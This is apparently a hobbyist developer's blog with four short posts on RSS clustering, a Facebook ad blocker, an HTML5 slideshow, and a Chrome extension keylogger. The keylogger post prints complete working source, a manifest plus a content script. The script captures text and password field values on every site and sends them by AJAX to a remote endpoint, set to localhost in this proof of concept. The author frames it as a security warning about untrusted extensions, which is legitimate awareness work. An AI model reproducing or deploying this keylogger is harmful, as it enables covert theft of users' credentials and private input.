Hierarchical clustering of blog posts fetched through RSS Feed

Today I tried to implement a simple webapp which retrieves some RSS feeds from a given URL and then looks for the content and uses a hierarchial clustering classifier to cluster them in some kind of categories by content similarity.

Actually the implementation is really poor, and I’m not even sure it works. Anyway, it’s been long since I wanted try some kind of text classifier, and here we are. It extracts the text from the RSS feed, then indexes the words inside it and tries to use them as features for the algorithm. Short posts generally means bad results, especially without any kind of generalization (tokenization should be the word in this case) of the features. In fact, results are hardly understandable and I guess they’re random.

Anyway, here’s a list of what I (sort of) learned along the way:

  • what is hierarchical clustering (not how it works, though)
  • d3.js graph library basics (very basic basics)
  • how to use NetBeans to develop webapps

That’s not so bad for a spare afternoon&evening.

As I said, I didn’t implement the algorithm myself, but I used a library from github, clusterfck.
Oh and I also used the jFeed jQuery plugin for parsing the RSS, but I slightly modified it to fetch the content of the entries and not to crash trying to detect IE.

Here‘s the link.

A thought (and proof-of-concept) about malicious Chrome extensions

Ok, today I made a simple Chrome extension, and suddenly got very excited about it (yeah I know, almost every blog post I write starts like this). Then reading about the extensions possibilities, I learned that the extensions are not limited by the same-origin policy.

This means that, if an extension made an AJAX request, it could be directed to a server different from the domain of the current page. This can be harmful in some different ways, the first I imagine is a simple keylogger extension which logs everything you type (passwords included) and sends it to a malicious server to collect them.

And that’s what I made, just to understand how difficult it was, and which kind of warning would the Google Web Store issue when you decide to add it to your browser.

Making the malicious extension

Actually, since that you can inject javascript, making the keylogger extension is straightforward: you just have to write two files, a manifest and the script:

manifest.json:

{
  "manifest_version": 2,
"name": "KeyLogger",
"description": "This extension logs everything you type.",
"version": "1.0.1",

"permissions": [
"http://*/*", "https://*/*"
],

"content_scripts": [{
"matches": ["http://*/*", "https://*/*"],
"js": ["script.js"]
}]
}

script.js:

var xmlhttp = new XMLHttpRequest();
console.log('Starting keylogger..')

setInterval( function() {

var inputs = document.getElementsByTagName('input')

var textAreas = document.getElementsByTagName('textarea')

var myLog = function(event) {
var what = encodeURIComponent(event.srcElement.value)

console.log("Logged: " + what)
console.log("Sending data to remote server..")
xmlhttp.open("GET","http://localhost/?"+what,true);
xmlhttp.send();
}

var getHandler = function(previousHandler,obj) {
return function(e) {
myLog(e);
if(previousHandler) previousHandler(e);
}
}

for(var i=0; i<inputs.length; i++) {
if(inputs[i].getAttribute('type') == 'text' || inputs[i].getAttribute('type') == 'password') {
inputs[i].onblur = getHandler(inputs[i].onblur,inputs[i])
}
}

for(var i=0; i<textAreas.length; i++) {
textAreas[i].onblur = getHandler(textAreas[i].onblur,textAreas[i])
}
},2000)

The script is a simple implementation that sends via AJAX requests every text you type in a textbox, password fields included. In this simple proof of concept it sends everything to localhost.

I tried it, and it works.

Installing the extension

 

I published it to the Chrome Web Store, and tried to install it, to see what kind of warning should show up, and all I got was this:

keyloggerwarning

 

..not so uncommon for, say, an Advertising blocking extension:

adblockpermissions

 

So this blog post is here to remind you that you should use only trusted Chrome extensions. It’s very easy to steal your data with a malicious chrome extension, it’s easy to hide some malicious code in a apparently innocent extensions and after you have installed it, it’s easy to forget about it.

Please don’t do bad things with my code and/or ideas.

 

Chrome Extension to block sponsored posts on the Facebook timeline

That’s what I did today. I wanted to find out how difficult actually was to make a chrome extension which injects some javascript in a page. After a discussion with some friends about website advertising I got the idea, and made the simple extension.

As part of the test, I registered a Chrome Web Store developer account and published the extension. I’ll post the link here as soon as the extension is accepted.

Update: here’s the link

An engaging design with HTML5

This little project consists in an HTML5 page/script to make “rich presentations”. The idea is to create a design which easily takes advantage of what HTML5 offers.

In this example I decided to implement a slideshow of photos enhanced with background music, which helps creating a very pleasing experience for the user. You could fully control the user experience also by setting timers to trigger the pages, or preventing people to skip pages by clicking, and so on. Unfortunately, the code is still very messed up, but I’m planning to organize it better and maybe share it in the future updating this post.

The project was created to experience some of the power of HTML5, which includes the audio tag and the fullscreen option (which I get with this jQuery plugin).

I didn’t try (I run linux on my PCs) but I wouldn’t be surprised in discovering that IE cannot execute the page correctly. It was tested on Firefox and Chromium, having a little better performances achieved by Firefox.

Here’s the link to the example, which uses photos taken by a friend of mine, Stefano Collovati, who I want to publicly thanks here for his help in designing the prototype.

All the photos are property of Stefano Collovati, you should contact him if you want further information about using and/or sharing them.